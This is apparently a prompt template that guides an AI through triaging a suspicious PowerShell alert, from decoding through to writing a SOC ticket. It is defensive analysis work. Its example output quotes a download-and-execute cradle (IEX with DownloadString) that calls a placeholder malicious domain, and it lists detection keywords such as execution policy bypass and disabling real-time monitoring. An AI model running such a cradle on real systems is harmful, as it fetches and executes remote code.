You are a SOC analyst investigating a suspicious PowerShell execution alert.
Assume an enterprise environment unless I specify otherwise.
Paste the raw PowerShell command or alert below.
Analyze the following:
1. Is the command encoded? (Base64, hex, or other obfuscation)
If yes, decode it and show the decoded output.
If the command cannot be decoded confidently, say "Unable to decode with provided data."
2. Does the command download anything from the internet?
(Invoke-WebRequest, IEX, DownloadString, curl, wget)
3. Does it attempt to bypass execution policy?
(-ExecutionPolicy Bypass, -ep bypass)
4. Does it run in a hidden window?
(-WindowStyle Hidden, -NonInteractive)
5. Does it disable security tools?
(Set-MpPreference, DisableRealtimeMonitoring)
Output format:
COMMAND OVERVIEW
- Encoded: Yes / No
- Decoded Command: [show decoded version or N/A]
- Obfuscation Techniques Detected: [list or None]
SUSPICIOUS INDICATORS
| Indicator | Evidence | Risk Level |
Only analyze what is present in the data provided.
Do not guess or assume values not in the alert.
[PASTE POWERSHELL COMMAND OR ALERT HERE]
2
Behavior Analysis
▶
Based on the PowerShell command from Step 1, analyze the intended behavior.
First analyze the full command before producing findings.
Determine:
1. What is this command trying to do in plain English?
2. Which of these attack techniques does it match?
- Download and execute payload
- Credential dumping
- Lateral movement
- Persistence mechanism
- Reconnaissance
- Defense evasion
- Reverse shell / C2 communication
For each matching technique:
- Cite the specific part of the command that indicates it
- Map to MITRE ATT&CK tactic and technique ID
- Rate confidence: High / Medium / Low
Then list the top 2 legitimate false positive scenarios that could produce this exact command.
If no clear behavior can be determined, state:
"Insufficient data to determine behavior."
3
Investigation Checklist
▶
Generate a targeted investigation checklist for this PowerShell alert.
For each item provide:
- Exact log source to check
- Specific event IDs or field values
- What malicious looks like vs benign
Also provide:
- 3 SIEM queries to hunt for related activity.
If the alert source tool is known, write queries for that tool.
If unknown, provide generic search logic and clearly label placeholders like [field_name].
- Parent process to investigate
- Child processes spawned by PowerShell to look for
- Network connections initiated by this process
⚠️ Mark top 2 steps as HIGH PRIORITY
Key event IDs to consider:
- 4103 / 4104 — PowerShell script block logging
- 4688 — Process creation
- 7045 — New service installed
Base everything on the actual alert data.
Do not give generic SOC advice.
4
SOC Ticket Summary
▶
Write a professional SOC ticket summary for this PowerShell investigation.
Include:
- What the alert detected (one sentence)
- Whether it appears malicious, suspicious, or benign and why
- The key evidence supporting that conclusion
- Recommended next action and who owns it
Length: 3-4 sentences maximum.
Format: suitable for pasting directly into a SIEM ticket.
Severity: Critical / High / Medium / Low / Informational
Disposition: True Positive / False Positive / Needs Investigation
MITRE ATT&CK MAPPING
| Tactic | Technique ID | Technique Name | Confidence |
IOCS
| IOC Type | Value | Context |
If no IOCs identified, state: "No IOCs identified."
Example Output
Here's what you can expect after completing this workflow:
COMMAND OVERVIEW
================
Encoded: Yes (Base64)
Decoded Command: IEX (New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')
Obfuscation Techniques: Base64 encoding, download cradle
SUSPICIOUS INDICATORS
======================
| Indicator | Evidence | Risk Level |
| Encoded command | Base64 string detected | High |
| Download cradle | DownloadString to external URL | Critical |
| Remote execution | IEX executing downloaded content | Critical |
BEHAVIOR ANALYSIS
=================
This command downloads and immediately executes a remote PowerShell script from an external server.
This is a classic malware dropper technique.
MITRE ATT&CK: T1059.001 — PowerShell
Confidence: High
SOC TICKET
==========
Severity: CRITICAL
Disposition: True Positive
Encoded PowerShell command detected downloading and executing a remote payload from malicious-domain.com.
This matches T1059.001 and indicates active malware staging.
Endpoint has been isolated pending forensic review.
Generate SOC Investigation Summary
Populate a ready-to-paste investigation report for your ticket or incident log.